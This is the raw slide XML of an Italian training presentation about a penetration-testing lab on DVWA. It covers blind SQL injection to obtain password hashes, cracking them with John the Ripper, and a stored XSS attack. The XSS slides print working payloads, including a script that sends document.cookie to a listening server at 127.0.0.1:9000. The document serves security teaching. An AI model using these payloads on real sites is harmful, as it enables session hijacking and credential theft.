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73"/>
    <p:restoredTop sz="94162"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="54" d="100"/>
          <a:sy n="54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C130-F481-CF4C-6DEE-2A6BA945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86E8-6C84-F327-9E18-CA2502D9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5641-98BA-BADE-EDC8-A663CAB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4D5D-D93A-567E-7CD1-45096052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0C50-5672-D2AF-DCDE-623570D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18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6C0-1220-77C6-066A-5828C9D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76637-A84A-93F4-4FD5-C96DA501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2BA0-2C09-7085-6703-F575222C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B97F-4508-17EF-BCCB-C834773C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6888-DAEE-D499-5B06-EE73126D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30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8CBCD-5024-3D5B-06AD-BD7446159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71F7D-684F-1441-5D20-6E36AA7C5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4F41-7BF3-983A-911B-7498432F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43EB-CDF8-305D-42DD-498A369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F7FB-0EAA-1079-AAAB-8F90647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70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522-191B-B531-3C94-768A2DF1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351-4918-9CCF-BD26-520730AD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7914-0131-A232-692B-85121C01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78E0-0450-D41E-B1A8-1AC2D2BD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73E5-8323-8FD2-A349-785B42C5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30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D834-31DA-5DF8-0BB5-F27995B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6F6E-0D53-1AC0-D858-3925DF3D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D57E-095B-334E-40D4-31A0426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A72E-C7B9-1F9D-8C41-6B299F2A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0C39-08FC-3352-3CD0-C362927F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03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F3F8-3640-D489-DBEF-6E089B92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B9C6-2EFC-B3C7-B7AC-630701E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EB4E-D71E-447D-605F-278A4027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C87-8D4E-42FA-6896-50F14B65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8823-8940-7A86-2EF1-F103DE0C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F0E2-5416-3706-1BD9-1DB462D0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46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258F-F822-CC60-827F-3E6ED860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F916-1E11-CF92-72C0-C8A9C142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B0B9-0F1E-550C-008F-D64AC288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C5FB1-705F-917B-28E5-913CFC07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010BF-7AC3-2ADF-A17C-1300421C0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2BAF1-88BE-80F9-0E67-DDFD2CE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84ECB-333A-48B6-765F-45B5C2C9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770B6-2D37-7401-67B4-E60A2B09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89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492-A727-5154-C39C-CF1B76F3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3ACE-D29E-97BE-0BD8-C89577A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4D628-E7AD-C53C-E787-4A68A63C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BEDA-3C87-8E3E-C12F-C67F801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592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49E05-ACE7-6DE0-3394-2E3F4F7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30A39-E15B-B81F-A402-1B4DDC54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05B7-24F2-83BC-4649-88635AF5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02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D6B6-6CCD-DC13-D23D-C2482DF4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7D4E-ED85-0E6D-7873-DAD05239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837F-2C1F-9463-B1E9-F420EDB0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C03F-74C3-9BD9-EC0D-4660B26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6CDB-FEB5-1B3D-D7A9-C1B8DE3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0DA-1AE7-AD13-224B-4B74023C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82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BDB-1655-F94E-85B0-47CC2B60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FC5A-5239-71EC-D6D4-D0D898A40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4964-DB36-4054-5A5F-0BCE1EF2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46F9-D55B-1EB7-8E87-465512BD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058A-19D2-86A6-8685-372B75EB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DA77E-49B3-3BED-83F0-F0599A26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64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7B75-F30F-916C-FE44-3CC03896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89E0-F0CA-CF08-5AC2-E1F48130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9BE9-A340-C5DD-2DA2-B55B7CC5F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0E0C-F80B-184C-BE26-38C9FFE7B0A2}" type="datetimeFigureOut">
              <a:rPr lang="en-IT" smtClean="0"/>
              <a:t>12/08/22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2DC0-2A9C-8C3B-C125-5E017380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C5AC-C5E1-89C0-C1FA-62505A784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65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FBF7-8494-7297-EEA2-0F6F9851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51" y="402848"/>
            <a:ext cx="6410908" cy="1053128"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IT" dirty="0"/>
              <a:t>Exploit sulle vulnerabilità SQL injection(blind)– XSS stored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CF75A-1A67-F155-3A81-46ACD6130C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="763555" y="2065957"/>
            <a:ext cx="324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Target: Utenti </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IT" dirty="0"/>
              <a:t>Indirizzo IP: 192.168.50.101</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IT" dirty="0"/>
              <a:t>	    192.168.50.100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919C-ABE6-A694-90EF-7A772CD8630F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8955421" y="3737289"/>
            <a:ext cx="210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Attività svolta da:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Marco Pisano</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IT" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Epicode srl</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57056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thical Hacking (Part 1): OWASP Top 10 and DVWA | by Michael Whittle |  Level Up Coding">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F43D3A15-01D3-B450-85E5-B16831A46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1" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-3047" y="0"/>
            <a:ext cx="9446510" cy="66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36C2-4305-01CE-A7CB-B516DD26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2" y="1557619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/>
              <a:t>Il Test di oggi è stato effettuato da Marco Pisano, seguendo quanto definito nella Fase D’ingaggio da parte di Epicode srl. Quest’oggi abbiamo recuperato le credenziali degli utenti registrati sulla pagina DVWA.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pP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39751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664AE-3EF2-21FA-3374-6EEC98AB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54" y="1577406"/>
            <a:ext cx="3398520" cy="34105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1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>P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ortiamo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il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livello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sicurezza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‘Low’ da ‘DVWA security’.</a:t>
            </a:r>
            <a:b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2)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Siamo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andati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recuerare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password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criptate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appartenenti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agli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ID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tramite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’SQL Injection(blind)’</a:t>
            </a:r>
            <a:b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0EA6DC-310D-B973-C0E8-0F34E4B8C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4C54-33BE-EEA9-A026-1B9AF4FB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377182" cy="1399223"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2300" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IT" sz="2300" dirty="0"/>
              <a:t>reaiamo un file Hash.txt con dentro admin e password ancora criptate e da decriptare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14603DF-B499-7A41-3621-2106DB436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9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12EE-D439-1529-396F-1C6F167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11" y="1668100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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Usiamo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John The ripper per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decriptare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password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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Mostriamo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password con il commando --show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991EA-1008-6B8B-DC10-2D77326C7599}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1063900" y="911116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JohnTheRipper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FEFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1.9.0</a:t>
            </a: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98AD2D-A486-7421-69D9-C889C21F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00789"/>
            <a:ext cx="6539075" cy="4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6CA40-B125-6141-4379-8D30F822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7" name="Graphic 6" descr="Dance">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19612F0E-1B36-AB34-F67C-FAC8BCEC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69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D3E4E7-46EC-7FFC-ED65-93A683D95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85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5" name="Freeform: Shape 19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F0CF2-DD45-109B-DCBC-96B5E287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02" y="3572705"/>
            <a:ext cx="5441443" cy="28615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1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Abbiamo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intercettato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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>effettuando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l’accesso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> al </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sito</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> DVWA con le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>loro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credenziali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. 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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Abbiamo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effettuato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l’accesso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tramite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admin:password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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Abbiamo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>
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>avviato</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> un server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tramite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> il commando: ‘python3 -m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http.server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> —bind 127.0.0.1 9000’</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/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3CDB0F0E-9394-92FA-82E8-322BB32C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en-IT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2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4A0F-0D02-3133-9C2D-A61C96A9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960"/>
            <a:ext cx="11353800" cy="4110079"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>Andati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XSS stored per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>andare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> ad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>intercettare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cookie. Con il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>seguente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> commando:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>)&lt;/script&gt;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Una volta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>intercettati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cookie, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>abbiamo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>lanciato</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> la nostra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>richiesta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>invio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> al server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>creato</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t> con il commando:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>='http://127.0.0.1:9000/?cookie=' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
              <a:t>&lt;/script</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="2000" dirty="0"/>
            </a:b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135602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266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Exploit sulle vulnerabilità SQL injection(blind)– XSS stored</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>1) Portiamo il livello di sicurezza a ‘Low’ da ‘DVWA security’. 2) Siamo andati a recuerare le password criptate appartenenti agli ID registrati tramite ’SQL Injection(blind)’  </vt:lpstr>
      <vt:lpstr>Creaiamo un file Hash.txt con dentro admin e password ancora criptate e da decriptare</vt:lpstr>
      <vt:lpstr>Usiamo John The ripper per decriptare le password  Mostriamo le password con il commando --show </vt:lpstr>
      <vt:lpstr>Parte 2</vt:lpstr>
      <vt:lpstr>1) Abbiamo intercettato i cookie effettuando l’accesso al sito DVWA con le loro credenziali.  2) Abbiamo effettuato l’accesso tramite admin:password 3) Abbiamo avviato un server tramite il commando: ‘python3 -m http.server —bind 127.0.0.1 9000’ </vt:lpstr>
      <vt:lpstr>Andati su XSS stored per andare ad intercettare i cookie. Con il seguente commando: &lt;script&gt;alert(document.cookie)&lt;/script&gt;   Una volta intercettati i cookie, abbiamo lanciato la nostra richiesta di invio al server creato con il commando: &lt;script&gt;window.location='http://127.0.0.1:9000/?cookie=' + document.cookie&lt;/script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Scansione Metasploitable con  Nessus Vulnerability Scanner</dc:title>
  <dc:creator>Marco Pisano</dc:creator>
  <cp:lastModifiedBy>Marco Pisano</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-05T14:18:45Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-08-12T15:50:52Z</dcterms:modified>
</cp:coreProperties>
</file>